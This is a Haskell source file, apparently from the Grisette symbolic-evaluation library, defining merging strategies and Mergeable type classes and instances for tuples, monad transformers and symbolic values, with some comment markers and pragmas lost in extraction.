import qualified Control.Monad.Writer.Strict as WriterStrict
import qualified Data.ByteString as B
import Data.Functor.Classes
import Data.Functor.Sum
import Data.Int
import Data.Kind
import qualified Data.Monoid as Monoid
import Data.Typeable
import Data.Word
import GHC.Natural
import qualified GHC.TypeLits
import GHC.TypeNats
import Generics.Deriving
import Grisette.Core.Data.BV
import Grisette.Core.Data.Class.Bool
import Grisette.IR.SymPrim.Data.Prim.InternedTerm.Term
import {-# SOURCE #-} Grisette.IR.SymPrim.Data.SymPrim
import Unsafe.Coerce
-- | Helper type for combining arbitrary number of indices into one.
-- Useful when trying to write efficient merge strategy for lists/vectors.
data DynamicSortedIdx where
DynamicSortedIdx :: forall idx. (Show idx, Ord idx, Typeable idx) => idx -> DynamicSortedIdx
instance Eq DynamicSortedIdx where
(DynamicSortedIdx (a :: a)) == (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> a == b
_ -> False
# INLINE (= =) #
instance Ord DynamicSortedIdx where
compare (DynamicSortedIdx (a :: a)) (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> compare a b
_ -> error "This Ord is incomplete"
# INLINE compare #
instance Show DynamicSortedIdx where
show (DynamicSortedIdx a) = show a
| Resolves the indices and the terminal merge strategy for a value of some ' ' type .
resolveStrategy :: forall x. MergingStrategy x -> x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy s x = resolveStrategy' x s
{-# INLINE resolveStrategy #-}
-- | Resolves the indices and the terminal merge strategy for a value given a merge strategy for its type.
resolveStrategy' :: forall x. x -> MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy' x = go
where
go :: MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
go (SortedStrategy idxFun subStrategy) = case go ss of
(idxs, r) -> (DynamicSortedIdx idx : idxs, r)
where
idx = idxFun x
ss = subStrategy idx
go s = ([], s)
{-# INLINE resolveStrategy' #-}
-- | Merging strategies.
--
-- __You probably do not need to know the details of this type if you are only going__
-- __to use algebraic data types. You can get merging strategies for them with type__
-- __derivation.__
--
In , a merged union ( if - then - else tree ) follows the _ _ /hierarchical/ _ _
-- __/sorted representation invariant/__ with regards to some merging strategy.
--
-- A merging strategy encodes how to merge a __/subset/__ of the values of a
given type . We have three types of merging strategies :
--
-- * Simple strategy
-- * Sorted strategy
-- * No strategy
--
The ' SimpleStrategy ' merges values with a simple merge function .
-- For example,
--
-- * the symbolic boolean values can be directly merged with 'ites'.
--
-- * the set @{1}@, which is a subset of the values of the type @Integer@,
-- can be simply merged as the set contains only a single value.
--
-- * all the 'Just' values of the type @Maybe SymBool@ can be simply merged
-- by merging the wrapped symbolic boolean with 'ites'.
--
The ' SortedStrategy ' merges values by first grouping the values with an
-- indexing function, and the values with the same index will be organized as
a sub - tree in the if - then - else structure of ' . Core . Data . UnionBase . UnionBase ' .
-- Each group (sub-tree) will be further merged with a sub-strategy for the
-- index.
The index type should be a totally ordered type ( with the ' '
type class ) . will use the indexing function to partition the values
-- into sub-trees, and organize them in a sorted way. The sub-trees will further
-- be merged with the sub-strategies. For example,
--
* all the integers can be merged with ' SortedStrategy ' by indexing with
the identity function and use the ' SimpleStrategy ' shown before as the
-- sub-strategies.
--
* all the @Maybe SymBool@ values can be merged with ' SortedStrategy ' by
-- indexing with 'Data.Maybe.isJust', the 'Nothing' and 'Just' values can then
-- then be merged with different simple strategies as sub-strategies.
--
The ' ' does not perform any merging .
-- For example, we cannot merge values with function types that returns concrete
-- lists.
--
For , we can automatically derive the ' ' type class , which
-- provides a merging strategy.
--
-- If the derived version does not work for you, you should determine
-- if your type can be directly merged with a merging function. If so, you can
implement the merging strategy as a ' SimpleStrategy ' .
-- If the type cannot be directly merged with a merging function, but could be
-- partitioned into subsets of values that can be simply merged with a function,
you should implement the merging strategy as a ' SortedStrategy ' .
-- For easier building of the merging strategies, check out the combinators
like ` wrapStrategy ` .
--
-- For more details, please see the documents of the constructors, or refer to
[ 's paper]( / files / POPL23.pdf ) .
data MergingStrategy a where
-- | Simple mergeable strategy.
--
-- For symbolic booleans, we can implement its merge strategy as follows:
--
> SimpleStrategy ites : : MergingStrategy SymBool
SimpleStrategy ::
-- | Merge function.
(SymBool -> a -> a -> a) ->
MergingStrategy a
-- | Sorted mergeable strategy.
--
For Integers , we can implement its merge strategy as follows :
--
> SortedStrategy i d ( \ _ - > SimpleStrategy $ \ _ t _ - > t )
--
-- For @Maybe SymBool@, we can implement its merge strategy as follows:
--
> SortedStrategy
-- > (\case; Nothing -> False; Just _ -> True)
-- > (\idx ->
> if idx
-- > then SimpleStrategy $ \_ t _ -> t
-- > else SimpleStrategy $ \cond (Just l) (Just r) -> Just $ ites cond l r)
SortedStrategy ::
(Ord idx, Typeable idx, Show idx) =>
-- | Indexing function
(a -> idx) ->
-- | Sub-strategy function
(idx -> MergingStrategy a) ->
MergingStrategy a
-- | For preventing the merging intentionally. This could be
-- useful for keeping some value concrete and may help generate more efficient
-- formulas.
--
See [ 's paper]( / files / POPL23.pdf ) for
-- details.
NoStrategy :: MergingStrategy a
-- | Useful utility function for building merge strategies manually.
--
-- For example, to build the merge strategy for the just branch of @Maybe a@,
-- one could write
--
> wrapStrategy Just fromMaybe rootStrategy : : MergingStrategy ( Maybe a )
wrapStrategy ::
-- | The merge strategy to be wrapped
MergingStrategy a ->
-- | The wrap function
(a -> b) ->
-- | The unwrap function, which does not have to be defined for every value
(b -> a) ->
MergingStrategy b
wrapStrategy (SimpleStrategy m) wrap unwrap =
SimpleStrategy
( \cond ifTrue ifFalse ->
wrap $ m cond (unwrap ifTrue) (unwrap ifFalse)
)
wrapStrategy (SortedStrategy idxFun substrategy) wrap unwrap =
SortedStrategy
(idxFun . unwrap)
(\idx -> wrapStrategy (substrategy idx) wrap unwrap)
wrapStrategy NoStrategy _ _ = NoStrategy
# INLINE wrapStrategy #
| Each type is associated with a root merge strategy given by ' rootStrategy ' .
-- The root merge strategy should be able to merge every value of the type.
will use the root merge strategy to merge the values of the type in
-- a union.
--
_ _ Note 1 : _ _ This type class can be derived for algebraic data types .
You may need the @DerivingVia@ and @DerivingStrategies@ extensions .
--
> data X = ... deriving Generic deriving via ( Default X )
class Mergeable a where
-- | The root merging strategy for the type.
rootStrategy :: MergingStrategy a
instance (Generic a, Mergeable' (Rep a)) => Mergeable (Default a) where
rootStrategy = unsafeCoerce (derivedRootStrategy :: MergingStrategy a)
# NOINLINE rootStrategy #
| Generic derivation for the ' ' class .
--
Usually you can derive the merging strategy with the @DerivingVia@ and
-- @DerivingStrategies@ extension.
--
> data X = ... deriving ( Generic ) deriving via ( Default X )
derivedRootStrategy :: (Generic a, Mergeable' (Rep a)) => MergingStrategy a
derivedRootStrategy = wrapStrategy rootStrategy' to from
# INLINE derivedRootStrategy #
| Lifting of the ' ' class to unary type constructors .
class Mergeable1 (u :: Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy :: MergingStrategy a -> MergingStrategy (u a)
-- | Lift the root merge strategy through the unary type constructor.
rootStrategy1 :: (Mergeable a, Mergeable1 u) => MergingStrategy (u a)
rootStrategy1 = liftRootStrategy rootStrategy
# INLINE rootStrategy1 #
| Lifting of the ' ' class to binary type constructors .
class Mergeable2 (u :: Type -> Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy2 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy (u a b)
-- | Lift the root merge strategy through the binary type constructor.
rootStrategy2 :: (Mergeable a, Mergeable b, Mergeable2 u) => MergingStrategy (u a b)
rootStrategy2 = liftRootStrategy2 rootStrategy rootStrategy
# INLINE rootStrategy2 #
| Lifting of the ' ' class to ternary type constructors .
class Mergeable3 (u :: Type -> Type -> Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy3 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy c -> MergingStrategy (u a b c)
-- | Lift the root merge strategy through the binary type constructor.
rootStrategy3 :: (Mergeable a, Mergeable b, Mergeable c, Mergeable3 u) => MergingStrategy (u a b c)
rootStrategy3 = liftRootStrategy3 rootStrategy rootStrategy rootStrategy
# INLINE rootStrategy3 #
instance (Generic1 u, Mergeable1' (Rep1 u)) => Mergeable1 (Default1 u) where
liftRootStrategy = unsafeCoerce (derivedLiftMergingStrategy :: MergingStrategy a -> MergingStrategy (u a))
# NOINLINE liftRootStrategy #
class Mergeable1' (u :: Type -> Type) where
liftRootStrategy' :: MergingStrategy a -> MergingStrategy (u a)
instance Mergeable1' U1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' V1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' Par1 where
liftRootStrategy' m = wrapStrategy m Par1 unPar1
{-# INLINE liftRootStrategy' #-}
instance Mergeable1 f => Mergeable1' (Rec1 f) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy m) Rec1 unRec1
{-# INLINE liftRootStrategy' #-}
instance Mergeable c => Mergeable1' (K1 i c) where
liftRootStrategy' _ = wrapStrategy rootStrategy K1 unK1
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' a => Mergeable1' (M1 i c a) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy' m) M1 unM1
{-# INLINE liftRootStrategy' #-}
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :+: b) where
liftRootStrategy' m =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy (liftRootStrategy' m) L1 (\case (L1 v) -> v; _ -> error "impossible")
else wrapStrategy (liftRootStrategy' m) R1 (\case (R1 v) -> v; _ -> error "impossible")
)
{-# INLINE liftRootStrategy' #-}
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :*: b) where
liftRootStrategy' m = product2Strategy (:*:) (\(a :*: b) -> (a, b)) (liftRootStrategy' m) (liftRootStrategy' m)
{-# INLINE liftRootStrategy' #-}
| Generic derivation for the ' ' class .
derivedLiftMergingStrategy :: (Generic1 u, Mergeable1' (Rep1 u)) => MergingStrategy a -> MergingStrategy (u a)
derivedLiftMergingStrategy m = wrapStrategy (liftRootStrategy' m) to1 from1
# INLINE derivedLiftMergingStrategy #
| Auxiliary class for the generic derivation for the ' ' class .
class Mergeable' f where
rootStrategy' :: MergingStrategy (f a)
instance Mergeable' U1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance Mergeable' V1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance (Mergeable c) => Mergeable' (K1 i c) where
rootStrategy' = wrapStrategy rootStrategy K1 unK1
# INLINE rootStrategy ' #
instance (Mergeable' a) => Mergeable' (M1 i c a) where
rootStrategy' = wrapStrategy rootStrategy' M1 unM1
# INLINE rootStrategy ' #
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :+: b) where
rootStrategy' =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy rootStrategy' L1 (\case (L1 v) -> v; _ -> undefined)
else wrapStrategy rootStrategy' R1 (\case (R1 v) -> v; _ -> undefined)
)
# INLINE rootStrategy ' #
-- | Useful utility function for building merge strategies for product types
-- manually.
--
-- For example, to build the merge strategy for the following product type,
-- one could write
--
> data X = X { x1 : : Int , x2 : : }
> product2Strategy X ( \(X a b ) - > ( a , b ) ) rootStrategy rootStrategy
-- > :: MergingStrategy X
product2Strategy ::
-- | The wrap function
(a -> b -> r) ->
-- | The unwrap function, which does not have to be defined for every value
(r -> (a, b)) ->
| The first merge strategy to be wrapped
MergingStrategy a ->
| The second merge strategy to be wrapped
MergingStrategy b ->
MergingStrategy r
product2Strategy wrap unwrap strategy1 strategy2 =
case (strategy1, strategy2) of
(NoStrategy, _) -> NoStrategy
(_, NoStrategy) -> NoStrategy
(SimpleStrategy m1, SimpleStrategy m2) ->
SimpleStrategy $ \cond t f -> case (unwrap t, unwrap f) of
((hdt, tlt), (hdf, tlf)) ->
wrap (m1 cond hdt hdf) (m2 cond tlt tlf)
(s1@(SimpleStrategy _), SortedStrategy idxf subf) ->
SortedStrategy (idxf . snd . unwrap) (product2Strategy wrap unwrap s1 . subf)
(SortedStrategy idxf subf, s2) ->
SortedStrategy (idxf . fst . unwrap) (\idx -> product2Strategy wrap unwrap (subf idx) s2)
{-# INLINE product2Strategy #-}
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :*: b) where
rootStrategy' = product2Strategy (:*:) (\(a :*: b) -> (a, b)) rootStrategy' rootStrategy'
# INLINE rootStrategy ' #
-- instances
#define CONCRETE_ORD_MERGEABLE(type) \
instance Mergeable type where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#define CONCRETE_ORD_MERGEABLE_BV(type) \
instance (KnownNat n, 1 <= n) => Mergeable (type n) where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#if 1
CONCRETE_ORD_MERGEABLE(Bool)
CONCRETE_ORD_MERGEABLE(Integer)
CONCRETE_ORD_MERGEABLE(Char)
CONCRETE_ORD_MERGEABLE(Int)
CONCRETE_ORD_MERGEABLE(Int8)
CONCRETE_ORD_MERGEABLE(Int16)
CONCRETE_ORD_MERGEABLE(Int32)
CONCRETE_ORD_MERGEABLE(Int64)
CONCRETE_ORD_MERGEABLE(Word)
CONCRETE_ORD_MERGEABLE(Word8)
CONCRETE_ORD_MERGEABLE(Word16)
CONCRETE_ORD_MERGEABLE(Word32)
CONCRETE_ORD_MERGEABLE(Word64)
CONCRETE_ORD_MERGEABLE(B.ByteString)
CONCRETE_ORD_MERGEABLE_BV(WordN)
CONCRETE_ORD_MERGEABLE_BV(IntN)
#endif
instance Mergeable SomeIntN where
rootStrategy =
SortedStrategy @Natural
(\(SomeIntN (v :: IntN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeIntN (IntN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
instance Mergeable SomeWordN where
rootStrategy =
SortedStrategy @Natural
(\(SomeWordN (v :: WordN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeWordN (WordN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
-- ()
deriving via (Default ()) instance Mergeable ()
-- Either
deriving via (Default (Either e a)) instance (Mergeable e, Mergeable a) => Mergeable (Either e a)
deriving via (Default1 (Either e)) instance (Mergeable e) => Mergeable1 (Either e)
instance Mergeable2 Either where
liftRootStrategy2 m1 m2 =
SortedStrategy
( \case
Left _ -> False
Right _ -> True
)
( \case
False -> wrapStrategy m1 Left (\case (Left v) -> v; _ -> undefined)
True -> wrapStrategy m2 Right (\case (Right v) -> v; _ -> undefined)
)
# INLINE liftRootStrategy2 #
-- Maybe
deriving via (Default (Maybe a)) instance (Mergeable a) => Mergeable (Maybe a)
deriving via (Default1 Maybe) instance Mergeable1 Maybe
-- | Helper type for building efficient merge strategy for list-like containers.
data StrategyList container where
StrategyList ::
forall bool a container.
container [DynamicSortedIdx] ->
container (MergingStrategy a) ->
StrategyList container
-- | Helper function for building efficient merge strategy for list-like containers.
buildStrategyList ::
forall bool a container.
(Functor container) =>
MergingStrategy a ->
container a ->
StrategyList container
buildStrategyList s l = StrategyList idxs strategies
where
r = resolveStrategy s <$> l
idxs = fst <$> r
strategies = snd <$> r
# INLINE buildStrategyList #
instance Eq1 container => Eq (StrategyList container) where
(StrategyList idxs1 _) == (StrategyList idxs2 _) = eq1 idxs1 idxs2
# INLINE (= =) #
instance Ord1 container => Ord (StrategyList container) where
compare (StrategyList idxs1 _) (StrategyList idxs2 _) = compare1 idxs1 idxs2
# INLINE compare #
instance Show1 container => Show (StrategyList container) where
showsPrec i (StrategyList idxs1 _) = showsPrec1 i idxs1
-- List
instance (Mergeable a) => Mergeable [a] where
rootStrategy = case rootStrategy :: MergingStrategy a of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList rootStrategy) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE rootStrategy #
instance Mergeable1 [] where
liftRootStrategy (ms :: MergingStrategy a) = case ms of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList ms) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE liftRootStrategy #
-- (,)
deriving via (Default (a, b)) instance (Mergeable a, Mergeable b) => Mergeable (a, b)
deriving via (Default1 ((,) a)) instance (Mergeable a) => Mergeable1 ((,) a)
instance Mergeable2 (,) where
liftRootStrategy2 = product2Strategy (,) id
# INLINE liftRootStrategy2 #
-- (,,)
deriving via
(Default (a, b, c))
instance
(Mergeable a, Mergeable b, Mergeable c) => Mergeable (a, b, c)
deriving via
(Default1 ((,,) a b))
instance
(Mergeable a, Mergeable b) => Mergeable1 ((,,) a b)
instance (Mergeable a) => Mergeable2 ((,,) a) where
liftRootStrategy2 = liftRootStrategy3 rootStrategy
# INLINE liftRootStrategy2 #
instance Mergeable3 (,,) where
liftRootStrategy3 m1 m2 m3 =
product2Strategy
(\a (b, c) -> (a, b, c))
(\(a, b, c) -> (a, (b, c)))
m1
(liftRootStrategy2 m2 m3)
# INLINE liftRootStrategy3 #
-- (,,,)
deriving via
(Default (a, b, c, d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable (a, b, c, d)
deriving via
(Default1 ((,,,) a b c))
instance
(Mergeable a, Mergeable b, Mergeable c) =>
Mergeable1 ((,,,) a b c)
-- (,,,,)
deriving via
(Default (a, b, c, d, e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable (a, b, c, d, e)
deriving via
(Default1 ((,,,,) a b c d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable1 ((,,,,) a b c d)
-- (,,,,,)
deriving via
(Default (a, b, c, d, e, f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable (a, b, c, d, e, f)
deriving via
(Default1 ((,,,,,) a b c d e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable1 ((,,,,,) a b c d e)
-- (,,,,,,)
deriving via
(Default (a, b, c, d, e, f, g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable (a, b, c, d, e, f, g)
deriving via
(Default1 ((,,,,,,) a b c d e f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable1 ((,,,,,,) a b c d e f)
-- (,,,,,,,)
deriving via
(Default (a, b, c, d, e, f, g, h))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g,
Mergeable h
) =>
Mergeable (a, b, c, d, e, f, g, h)
deriving via
(Default1 ((,,,,,,,) a b c d e f g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable1 ((,,,,,,,) a b c d e f g)
-- function
instance (Mergeable b) => Mergeable (a -> b) where
rootStrategy = case rootStrategy @b of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE rootStrategy #
instance Mergeable1 ((->) a) where
liftRootStrategy ms = case ms of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE liftRootStrategy #
-- MaybeT
instance (Mergeable1 m, Mergeable a) => Mergeable (MaybeT m a) where
rootStrategy = wrapStrategy rootStrategy1 MaybeT runMaybeT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (MaybeT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) MaybeT runMaybeT
# INLINE liftRootStrategy #
-- ExceptT
instance
(Mergeable1 m, Mergeable e, Mergeable a) =>
Mergeable (ExceptT e m a)
where
rootStrategy = wrapStrategy rootStrategy1 ExceptT runExceptT
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable e) => Mergeable1 (ExceptT e m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) ExceptT runExceptT
# INLINE liftRootStrategy #
-- state
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateLazy.StateT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) StateLazy.StateT StateLazy.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateLazy.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateLazy.StateT
StateLazy.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateStrict.StateT s m a)
where
rootStrategy =
wrapStrategy (liftRootStrategy rootStrategy1) StateStrict.StateT StateStrict.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateStrict.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateStrict.StateT
StateStrict.runStateT
# INLINE liftRootStrategy #
-- writer
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterLazy.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterLazy.WriterT WriterLazy.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterLazy.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterLazy.WriterT
WriterLazy.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterStrict.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterStrict.WriterT WriterStrict.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterStrict.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterStrict.WriterT
WriterStrict.runWriterT
# INLINE liftRootStrategy #
-- reader
instance
(Mergeable a, Mergeable1 m) =>
Mergeable (ReaderT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) ReaderT runReaderT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (ReaderT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy m))
ReaderT
runReaderT
# INLINE liftRootStrategy #
-- Sum
instance
(Mergeable1 l, Mergeable1 r, Mergeable x) =>
Mergeable (Sum l r x)
where
rootStrategy =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy rootStrategy1 InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy rootStrategy1 InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE rootStrategy #
instance (Mergeable1 l, Mergeable1 r) => Mergeable1 (Sum l r) where
liftRootStrategy m =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy (liftRootStrategy m) InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy (liftRootStrategy m) InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE liftRootStrategy #
-- Ordering
deriving via
(Default Ordering)
instance
Mergeable Ordering
Generic
deriving via
(Default (U1 x))
instance
Mergeable (U1 x)
deriving via
(Default (V1 x))
instance
Mergeable (V1 x)
deriving via
(Default (K1 i c x))
instance
(Mergeable c) => Mergeable (K1 i c x)
deriving via
(Default (M1 i c a x))
instance
(Mergeable (a x)) => Mergeable (M1 i c a x)
deriving via
(Default ((a :+: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :+: b) x)
deriving via
(Default ((a :*: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :*: b) x)
-- Identity
instance (Mergeable a) => Mergeable (Identity a) where
rootStrategy = wrapStrategy rootStrategy Identity runIdentity
# INLINE rootStrategy #
instance Mergeable1 Identity where
liftRootStrategy m = wrapStrategy m Identity runIdentity
# INLINE liftRootStrategy #
-- IdentityT
instance (Mergeable1 m, Mergeable a) => Mergeable (IdentityT m a) where
rootStrategy = wrapStrategy rootStrategy1 IdentityT runIdentityT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (IdentityT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy m) IdentityT runIdentityT
# INLINE liftRootStrategy #
-- ContT
instance (Mergeable1 m, Mergeable r) => Mergeable (ContT r m a) where
rootStrategy =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable r) => Mergeable1 (ContT r m) where
liftRootStrategy _ =
wrapStrategy
(liftRootStrategy rootStrategy1)
ContT
(\(ContT v) -> v)
# INLINE liftRootStrategy #
RWS
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSLazy.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSLazy.RWST (\(RWSLazy.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSLazy.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSLazy.RWST
(\(RWSLazy.RWST rws) -> rws)
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable a, Mergeable1 m) =>
Mergeable (RWSStrict.RWST r w s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy (liftRootStrategy rootStrategy1)) RWSStrict.RWST (\(RWSStrict.RWST m) -> m)
# INLINE rootStrategy #
instance
(Mergeable s, Mergeable w, Mergeable1 m) =>
Mergeable1 (RWSStrict.RWST r w s m)
where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy (liftRootStrategy3 m rootStrategy rootStrategy))))
RWSStrict.RWST
(\(RWSStrict.RWST rws) -> rws)
# INLINE liftRootStrategy #
-- Data.Monoid module
deriving via
(Default (Monoid.Sum a))
instance
(Mergeable a) => Mergeable (Monoid.Sum a)
deriving via (Default1 Monoid.Sum) instance Mergeable1 Monoid.Sum
#define MERGEABLE_SIMPLE(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV(symtype) \
instance (KnownNat n, 1 <= n) => Mergeable (symtype n) where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_BV_SOME(symtype) \
instance Mergeable symtype where \
rootStrategy = SimpleStrategy ites
#define MERGEABLE_FUN(op) \
instance (SupportedPrim ca, SupportedPrim cb, LinkedRep ca sa, LinkedRep cb sb) => Mergeable (sa op sb) where \
rootStrategy = SimpleStrategy ites
#if 1
MERGEABLE_SIMPLE(SymBool)
MERGEABLE_SIMPLE(SymInteger)
MERGEABLE_BV(SymIntN)
MERGEABLE_BV(SymWordN)
MERGEABLE_BV_SOME(SomeSymIntN)
MERGEABLE_BV_SOME(SomeSymWordN)
MERGEABLE_FUN(=~>)
MERGEABLE_FUN(-~>)
#endif
-- Exceptions
instance Mergeable ArithException where
rootStrategy =
SortedStrategy
( \case
Overflow -> 0 :: Int
Underflow -> 1 :: Int
LossOfPrecision -> 2 :: Int
DivideByZero -> 3 :: Int
Denormal -> 4 :: Int
RatioZeroDenominator -> 5 :: Int
)
(const $ SimpleStrategy $ \_ l r -> l)
deriving via (Default BitwidthMismatch) instance (Mergeable BitwidthMismatch)
| null | https://raw.githubusercontent.com/lsrcz/grisette/1d2fab89acb160ee263a41741454a5825094bd33/src/Grisette/Core/Data/Class/Mergeable.hs | haskell | # LANGUAGE GADTs #
# LANGUAGE RankNTypes #
|
License : BSD-3-Clause (see the LICENSE file)
Maintainer :
Stability : Experimental
* Merging strategy
* Combinators for manually building merging strategies
# SOURCE #
| Helper type for combining arbitrary number of indices into one.
Useful when trying to write efficient merge strategy for lists/vectors.
# INLINE resolveStrategy #
| Resolves the indices and the terminal merge strategy for a value given a merge strategy for its type.
# INLINE resolveStrategy' #
| Merging strategies.
__You probably do not need to know the details of this type if you are only going__
__to use algebraic data types. You can get merging strategies for them with type__
__derivation.__
__/sorted representation invariant/__ with regards to some merging strategy.
A merging strategy encodes how to merge a __/subset/__ of the values of a
* Simple strategy
* Sorted strategy
